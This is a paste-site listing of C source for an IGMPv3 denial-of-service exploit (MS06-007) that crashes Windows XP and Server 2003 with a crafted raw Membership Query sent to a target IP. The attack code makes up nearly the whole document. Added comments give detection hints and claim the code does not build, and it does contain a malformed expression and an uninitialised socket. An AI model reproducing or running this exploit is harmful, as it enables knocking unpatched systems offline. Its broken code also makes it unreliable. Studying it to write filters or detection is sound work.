FlyFar

IGMP v3.0 DoS Exploit - The Byzantine Attack

Jul 22nd, 2023
  1. /*
  2. IGMP v3 DoS Exploit
  3.  
  4. ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
  5. ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
  6.  
  7. by Alexey Sintsov (dookie@inbox.ru)
  8.  
  9. Req:
  10. Administrator rights on system
  11. Windows Firewall off (for sending RAW packets)
  12.  
  13. Affected Products:
  14. Microsoft Corporation Windows XP All
  15. Microsoft Corporation Windows Server 2003 All
  16. */
  17.  
  18.  
  19. #include <stdio.h>
  20. #include <sys/socket.h>
  21.  
/*
 * IPv4 header as this listing lays it out for the wire: the fixed fields
 * followed by two 16-bit words (4 bytes) of IP options. Member order is the
 * on-wire order, so it must not be rearranged.
 * NOTE(review): assumes the compiler inserts no padding between members;
 * confirm for the toolchain in use.
 */
typedef struct iphdr
{
    unsigned char verlen; // IP version & length
    unsigned char tos; // Type of service
    unsigned short total_len; // Total length of the packet
    unsigned short ident; // Unique identifier
    unsigned short frag_and_flags; // Flags
    unsigned char ttl; // Time to live
    unsigned char proto; // Protocol (TCP, UDP etc)
    unsigned short checksum; // IP checksum
    unsigned int sourceIP; // Source IP
    unsigned int destIP; // Destination IP
    unsigned short options[2]; // IP options area that follows the fixed header fields

} IPHEADER;
  37.  
/*
 * IGMP message body used by this listing. The member sequence appears to
 * follow the IGMPv3 Membership Query layout (type, max response code,
 * checksum, group address, Resv/S/QRV, QQIC, number of sources, one source
 * address); verify against RFC 3376 before relying on it.
 * NOTE(review): `unsigned long` is presumably 32 bits here, as on Windows;
 * where it is wider the struct would not match the wire format. Confirm.
 */
typedef struct igmphdr {
    unsigned char type;      // IGMP message type
    unsigned char code;      // second header byte; presumably the Max Resp Code
    unsigned short checksum; // checksum field of the IGMP message
    unsigned long group;     // group address
    unsigned char ResvSQVR;  // presumably the Resv/S/QRV byte
    unsigned char QQIC;      // presumably the Querier's Query Interval Code
    unsigned short num;      // stored via htons() by sendIGMP; presumably the source count
    unsigned long addes;     // presumably the single source-address slot

} IGMPHEADER;
  49.  
/*
 * 16-bit one's-complement checksum over `size` bytes starting at `buffer`.
 *
 * Full 16-bit words are summed first; if bytes remain after the word loop,
 * one more byte is added as-is. The carries above bit 15 are then folded
 * back into the low 16 bits and the complement of the result is returned.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    USHORT *word = buffer;
    int remaining;

    /* Consume the input two bytes at a time. */
    for (remaining = size; remaining > 1; remaining -= sizeof(USHORT)) {
        sum += *word;
        word++;
    }

    /* Leftover byte: add it without shifting. */
    if (remaining != 0) {
        sum += *(UCHAR *)word;
    }

    /* Fold the carries into the low 16 bits (second step absorbs a new carry). */
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (USHORT)(~sum);
}
  67.  
/*
 * Assembles one IPv4 + IGMP datagram in a 60-byte stack buffer and passes it
 * to sendto().
 *
 * a: source address as a dotted-quad string (parsed with inet_addr)
 * b: destination address as a dotted-quad string (parsed with inet_addr)
 * Returns 1 after sendto() succeeds, 0 when sendto() reports SOCKET_ERROR,
 * and FALSE when the setsockopt() call fails.
 *
 * Defender's reading of the datagram described here: IP protocol IGMP, an IP
 * header that carries four bytes of options which are all zero, and an IGMP
 * body of type 0x11 listing one source. The file header attributes this to
 * the issue covered by MS06-007 for Windows XP and Windows Server 2003; the
 * vendor update referenced there is the fix. IGMP traffic carrying IP
 * options from outside the local segment is, in general, a reasonable thing
 * to alert on or filter. Validate any rule against your own traffic.
 *
 * NOTE(review): the listing does not build as pasted; read it as a
 * description of the packet layout rather than as a working program.
 */
int sendIGMP(char* a, char* b)
{
    unsigned int dst_addr, src_addr;

    IPHEADER ipHeader;
    IGMPHEADER igmpHeader;
    /* Neither inet_addr() result is checked for a parse failure. */
    dst_addr=inet_addr (b);
    src_addr=inet_addr (a);

    char szSendBuf[60]={0};
    int rect;

    SOCKET sock;

    /* Option number 2 at level IPPROTO_IP is presumably IP_HDRINCL (caller
       supplies its own IP header); confirm against the Winsock headers. */
    BOOL flag=TRUE;
    if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
        printf("Set options error");
        closesocket(sock);
        WSACleanup();
        return FALSE;
    }

    /* Destination for sendto(); sin_port is filled in although IGMP itself
       has no port field. */
    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=htons(99);
    ssin.sin_addr.s_addr=dst_addr;

    /* Version/header-length byte. The length term is derived from the whole
       struct, options included, so the header advertises that IP options
       are present. */
    ipHeader.verlen=(4<<4 sizeof(ipHeader)/sizeof(unsigned long));
    ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

    ipHeader.ident=htons(0);

    ipHeader.frag_and_flags=0;

    ipHeader.ttl=128;
    ipHeader.proto=IPPROTO_IGMP;

    /* Zeroed here; overwritten with the computed value further down. */
    ipHeader.checksum=0;

    ipHeader.tos=0;

    ipHeader.destIP=dst_addr;
    ipHeader.sourceIP=src_addr;

    /* Both option words are zero. The original author marks this field as
       the trigger; for detection the visible trait is an IGMP datagram whose
       IP header is longer than the fixed 20 bytes. */
    //Ip options
    ipHeader.options[0]=htons(0x0000); //bug is here =)
    ipHeader.options[1]=htons(0x0000);

    /* IGMP body: one source entry, and that entry is the destination
       address itself; the group address is 0.0.0.0. */
    igmpHeader.type=0x11; //v3 Membership Query
    igmpHeader.code=5;
    igmpHeader.num=htons(1);
    igmpHeader.ResvSQVR=0x0;
    igmpHeader.QQIC=0;
    igmpHeader.group=inet_addr("0.0.0.0");
    igmpHeader.addes=dst_addr;

    igmpHeader.checksum=0;

    /* The IGMP struct is copied to the start of the buffer only so that
       checksum() can run over it with the checksum field still zero. */
    memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

    igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

    /* Final layout: IP header, then the IGMP body, then four zero bytes. */
    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
    memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
    memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

    /* As written, the IP checksum is taken over header plus IGMP body and
       the result is passed through ntohs() before being stored. */
    ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

    /* Re-copy the header so the buffer carries the checksum just computed. */
    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

    rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

    if (rect==SOCKET_ERROR) {
        printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
        return 0;
    }

    closesocket(sock);


    return 1;
}
  152.  
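/*
 * Entry point. Expects two positional arguments, in the order shown by the
 * usage text: <target ip> then <source ip>. With fewer arguments it prints
 * the usage text and returns 0. Otherwise it calls sendIGMP() with the
 * source address first and the target second, and returns 0 whatever the
 * outcome of that call.
 */
int main(int argc, char **argv)
{
    /*
     * argv[2] is read below, so both arguments must be present. The earlier
     * test (argc<2) let a single-argument invocation pass a NULL argv[2] on
     * to inet_addr().
     */
    if (argc < 3)
    {
        printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
        printf("Usage:\n");
        printf("c:\\igmps.exe <target ip> <source ip>\n\n");
        return 0;
    }

    sendIGMP(argv[2], argv[1]);
    return 0;
}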
Tags: Exploit DoS IGMP